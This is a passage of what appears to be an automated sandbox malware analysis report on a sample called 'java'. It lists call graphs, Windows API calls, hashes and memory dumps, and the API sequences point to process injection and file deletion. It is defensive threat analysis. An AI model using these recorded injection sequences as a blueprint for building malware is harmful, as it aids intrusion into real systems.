3139->3140 3141 2263f8a Sleep 3140->3141 3141->3142 3145 2264052 3143->3145 3144 22640ba 3144->3142 3145->3144 3147 22640be 3145->3147 3152 22639d7 RtlInitializeCriticalSection 3147->3152 3151 22640c8 3151->3144 3153 22639e7 VirtualAlloc 3152->3153 3153->3153 3154 22639ff 3153->3154 3155 226382b VirtualAlloc 3154->3155 3155->3155 3156 2263843 CreateThread 3155->3156 3156->3151 3187 2263d6a 3188 2263d6f 3187->3188 3189 22639d7 2 API calls 3188->3189 3190 2263d8a 3189->3190 3191 226382b 2 API calls 3190->3191 3192 2263d8f 3191->3192 3193 22634ea lstrlen 3196 2262790 3193->3196 3195 2263503 VirtualFree CloseHandle 3197 22627a1 3196->3197 3197->3195 3198 22631ea 3199 22631ef 3198->3199 3200 226320d lstrcat 3199->3200 3201 226321a 3200->3201 3202 2263242 GetStartupInfoA CreateProcessA CloseHandle CloseHandle 3201->3202 3203 226329a 3201->3203 3202->3203 3204 2264d49 3205 2264d56 3204->3205 3206 2264d72 3204->3206 3205->3206 3207 2264d68 SetEvent 3205->3207 3207->3206 3157 2263f31 3158 2263f36 3157->3158 3159 2263f5f 3158->3159 3160 2263f4f GetModuleHandleA 3158->3160 3162 2263f6a Sleep 3159->3162 3161 226403f 4 API calls 3160->3161 3163 2263f5d 3161->3163 3164 2263f9c 3162->3164 3165 2263f7a Sleep 3164->3165 3166 2263f9c 3165->3166 3167 2263f8a Sleep 3166->3167 3167->3163 3208 2262951 3209 2263677 3208->3209 3210 2262956 LoadLibraryA 3209->3210 3211 226296c 3210->3211 3212 2262985 VirtualAlloc 3211->3212 3212->3212 3213 226299d 3212->3213 3231 22629ca 3213->3231 3232 2263677 3231->3232 3233 22629cf lstrcat 3232->3233 3234 22629e5 3233->3234 3248 2262a01 3234->3248 3249 2263677 3248->3249 3250 2262a06 lstrcat 3249->3250 3251 2262a1c 3250->3251 3261 2262a38 3251->3261 3262 2263677 3261->3262 3263 2262a3d lstrcat 3262->3263 3267 2262a44 3263->3267 3265 2262aae DeleteFileA 3265->3267 3266 2262af2 DeleteFileA 3266->3267 3267->3265 3267->3266 3268 2262b58 Sleep 3267->3268 3269 2262b42 DeleteFileA 3267->3269 3270 2262b71 3267->3270 3268->3267 3269->3268 3272 2262b82 3270->3272 3271 2262c65 Sleep 3271->3271 3271->3272 3272->3271 3273 2262d1b 3272->3273 3273->3267 3118 5e0000 VirtualProtect 3119 5e034e 3118->3119 3120 5e0528 VirtualProtect 3119->3120 3121 5e06d0 VirtualProtect 3119->3121 3120->3119

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 23 401000-401009 24 40100c-401018 23->24 24->24 25 40101a-40102c 24->25 26 40102e-40103d 25->26 26->26 27 40103f-401043 26->27 27->26 28 401045-40106e VirtualAlloc call 401075 27->28 30 401073 28->30 30->30
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00401064
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1653862452.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1653848704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID: alAl
                                                                                                                                                                                          • API String ID: 4275171209-1316302345
                                                                                                                                                                                          • Opcode ID: f227270a32c0f617dc1efc8abb71a5ab52e3202e42098f1172127993d55cb963
                                                                                                                                                                                          • Instruction ID: 5af7c2372beb94d1e1b866602b7db5847228e6fe9b98f09dddad8bbdacf03bae
                                                                                                                                                                                          • Opcode Fuzzy Hash: f227270a32c0f617dc1efc8abb71a5ab52e3202e42098f1172127993d55cb963
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1015A36A401618FD765CF18C841F41B3E1BF48325F1A81A5D989AB7A2C778FC92CB88
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02260005 Relevance: 2.6, APIs: 1, Instructions: 1116COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0226098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 022609A5
                                                                                                                                                                                            • Part of subcall function 0226098B: GetStartupInfoA.KERNEL32(00000000), ref: 022609BD
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0226001D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitInfoMutexOpenProcessStartup
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 213680645-0
                                                                                                                                                                                          • Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                                          • Instruction ID: 018821dbfb8d3565c4018009c9c3f7214208bb4e88274612129ac9bd26566969
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                                          • Instruction Fuzzy Hash: A072D16342E3C14FD7279BE04A6C6757F78BF03208B1D10CBC4819A0BBD6545B99E76A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005E0000 Relevance: 21.4, APIs: 3, Strings: 9, Instructions: 395memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1653956491.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5e0000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID: $1;$@$C[$R$d:$wJ$y7$v
                                                                                                                                                                                          • API String ID: 544645111-3459585926
                                                                                                                                                                                          • Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                                          • Instruction ID: a8d1d2b531a601f7109a4b1ffc95ff65a13b03a51ff0994c2c6215d850f765d0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 903267B8E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341D775AE85CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 022609FD Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessA.KERNELBASE(00000000,022609F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02260A04
                                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02260A2C
                                                                                                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,000000EB,00000040,00000000), ref: 02260A57
                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(000000FF,000000FF,?,02265834,00000000,00000000,00000002), ref: 02260A9C
                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,000000EB,00000000), ref: 02260ACA
                                                                                                                                                                                          • ResumeThread.KERNELBASE(?), ref: 02260ADA
                                                                                                                                                                                          • Sleep.KERNELBASE(000003E8), ref: 02260AEA
                                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02260B01
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWow64Write
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1738979855-0
                                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction ID: c09bd413a69d671c3068c4b69bde5df0d06591151c2550f111c05e6c9db6c104
                                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B3154326502159FEF225F50CC85BA977B8FF04748F0405D4AA49FE0E9DBB09AA0DE54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02263409 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 479 2263409-2263462 GetVolumeInformationA call 2263634
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetVolumeInformationA.KERNELBASE(02263405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 02263409
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                                          • Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                                          • Instruction ID: 4c4363e9401d7ce29dd3ff6ff61f410553fc441be3b3e610dd4644be9fdd41d3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29F0FE75500154DBEF02EF24C485A9A77F8AF44344F4504C8AA4DBF206CA709595CFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 02261845 Relevance: .4, Instructions: 370COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8ea4e0c3cf8ecf2bfa90a777e44b91728a4d3afd2e27c35c42be2dc60894fdda
                                                                                                                                                                                          • Instruction ID: f462f393f1e838e75aae57660c309a560d8334809746bee654342f66c26e16b7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ea4e0c3cf8ecf2bfa90a777e44b91728a4d3afd2e27c35c42be2dc60894fdda
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58C1D6264246878EE7158AA8C05D3F2BFD5BB12318F489389C19D4F3DBC399A1E9C7D1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02260EA9 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0d754edaa701a15154bb9a4648fd9545ba8bd32677100c0784a8600ca5aed839
                                                                                                                                                                                          • Instruction ID: f482395870cdbbdf57aa0e7b31be2b0ba2647f55f0b1eda4d3bd01f74ce1dcda
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d754edaa701a15154bb9a4648fd9545ba8bd32677100c0784a8600ca5aed839
                                                                                                                                                                                          • Instruction Fuzzy Hash: 76B1F8225647878AE7258A98C01D3F2BF957B12328F0893C9C59D0F3E7C3A5A2D9D7C1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02260C63 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f1cf879b00919bdefd480fb5a14bd237a5ae1218ef57fef6b742790238e8c1a6
                                                                                                                                                                                          • Instruction ID: 42e687cab3e91ba0d79e64a924876dbe3662425e574637ff4c7bfcf9c0ac2d6e
                                                                                                                                                                                          • Opcode Fuzzy Hash: f1cf879b00919bdefd480fb5a14bd237a5ae1218ef57fef6b742790238e8c1a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 77D0C579661550CFCA56CB58C1D8E10B3B2FB48764B168495E80A8B766C335ED46DE00
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02262951 Relevance: 13.7, APIs: 9, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(02262949,00000008,?,00000000,02262835,00000000), ref: 02262956
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 02262993
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022629C1), ref: 022629D0
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022629F8), ref: 02262A07
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02262A2F), ref: 02262A3E
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AB8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AFC
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02262B52
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02262B66
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                                          • Instruction ID: 07d130e1ca34181be00982cb756b639c9df27b9fac1c3c258489fe499713d2af
                                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D517073410354DEDB22AFB08D4CFBB76BDEF40705F0405A5AE45EA049DA758AC0CEA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 022629CA Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022629C1), ref: 022629D0
                                                                                                                                                                                            • Part of subcall function 02262A01: lstrcat.KERNEL32(00000000,022629F8), ref: 02262A07
                                                                                                                                                                                            • Part of subcall function 02262A01: lstrcat.KERNEL32(00000000,02262A2F), ref: 02262A3E
                                                                                                                                                                                            • Part of subcall function 02262A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AB8
                                                                                                                                                                                            • Part of subcall function 02262A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AFC
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02262B52
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02262B66
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 588723932-0
                                                                                                                                                                                          • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                                          • Instruction ID: 17294a9b2a76e5e78d438cc7d3f71aed0829c459954961c3e9469c4f59d27bb6
                                                                                                                                                                                          • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                                          • Instruction Fuzzy Hash: CC414273410355DEDB22AFB08D4CFBB72BDEF40709F4406A5AE45EA049DA759AC0CEA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02262A01 Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 605 2262a01-2262a3e call 2263677 lstrcat call 2262525 call 2262a38 call 2263677 lstrcat 615 2262a44-2262a67 call 2262b71 call 226351b 605->615 619 2262a6c-2262a73 615->619 619->615 620 2262a75-2262a91 call 2263463 call 22626a7 619->620 625 2262a93 620->625 626 2262abe-2262ad5 call 22626a7 620->626 625->626 627 2262a95-2262aaa call 226271d 625->627 631 2262ad7 626->631 632 2262b02-2262b19 call 22626a7 626->632 627->626 636 2262aac 627->636 631->632 634 2262ad9-2262aee call 226271d 631->634 641 2262b1c-2262b35 call 2262ebb 632->641 642 2262b1b 632->642 634->632 643 2262af0 634->643 636->626 639 2262aae-2262ab8 DeleteFileA 636->639 639->626 647 2262b37-2262b40 call 226307b 641->647 648 2262b58-2262b6c Sleep 641->648 642->641 643->632 645 2262af2-2262afc DeleteFileA 643->645 645->632 647->648 651 2262b42-2262b52 DeleteFileA 647->651 648->619 651->648
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022629F8), ref: 02262A07
                                                                                                                                                                                            • Part of subcall function 02262A38: lstrcat.KERNEL32(00000000,02262A2F), ref: 02262A3E
                                                                                                                                                                                            • Part of subcall function 02262A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AB8
                                                                                                                                                                                            • Part of subcall function 02262A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AFC
                                                                                                                                                                                            • Part of subcall function 02262A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02262B52
                                                                                                                                                                                            • Part of subcall function 02262A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02262B66
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4261675396-0
                                                                                                                                                                                          • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                                          • Instruction ID: 6e226367b48c5ded2eeb53e6b818fa1be9f6da486c323f5eb96658b9d67f9a8c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                                          • Instruction Fuzzy Hash: AA413273410359DEDB22AFB08D4CFBB76BDEF40705F4005A5AE85EA058DA759AC0CEA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02262A38 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 652 2262a38-2262a3e call 2263677 lstrcat 655 2262a44-2262a67 call 2262b71 call 226351b 652->655 659 2262a6c-2262a73 655->659 659->655 660 2262a75-2262a91 call 2263463 call 22626a7 659->660 665 2262a93 660->665 666 2262abe-2262ad5 call 22626a7 660->666 665->666 667 2262a95-2262aaa call 226271d 665->667 671 2262ad7 666->671 672 2262b02-2262b19 call 22626a7 666->672 667->666 676 2262aac 667->676 671->672 674 2262ad9-2262aee call 226271d 671->674 681 2262b1c-2262b35 call 2262ebb 672->681 682 2262b1b 672->682 674->672 683 2262af0 674->683 676->666 679 2262aae-2262ab8 DeleteFileA 676->679 679->666 687 2262b37-2262b40 call 226307b 681->687 688 2262b58-2262b6c Sleep 681->688 682->681 683->672 685 2262af2-2262afc DeleteFileA 683->685 685->672 687->688 691 2262b42-2262b52 DeleteFileA 687->691 688->659 691->688
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02262A2F), ref: 02262A3E
                                                                                                                                                                                            • Part of subcall function 02262B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 02262C68
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AB8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AFC
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02262B52
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02262B66
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 531250245-0
                                                                                                                                                                                          • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                                          • Instruction ID: 8fac7f62e47a046336325b515c200622254cc6718993968ddf70090f6a3af4ed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A313E72410259DEDB226EB08D4CFBB76BCEF40709F4006A5AE45EA058DA3599C0CEA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 022631EA Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0226320E
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 0226324C
                                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,022631D9,00000011,?,00000000,00000000), ref: 02263279
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,022631D9,00000011,?,00000000,00000000,00000000,02263092,00000004,00000000), ref: 02263285
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,022631D9,00000011,?,00000000,00000000,00000000,02263092,00000004,00000000), ref: 02263291
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                                          • Instruction ID: f615e30daafb3de9f649663f9ab0fa1c254c66a50b6cbd94df7f4dcf74960c49
                                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                                          • Instruction Fuzzy Hash: 031112728106189FDF12ABA0CC88AAEB7BDEF50706F054595E985EA048DA705A90CEA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02263F31 Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,02263F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02263F51
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,00000000,?,02263F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02263F6F
                                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 02263F7F
                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 02263F8F
                                                                                                                                                                                          Memory Dump Source
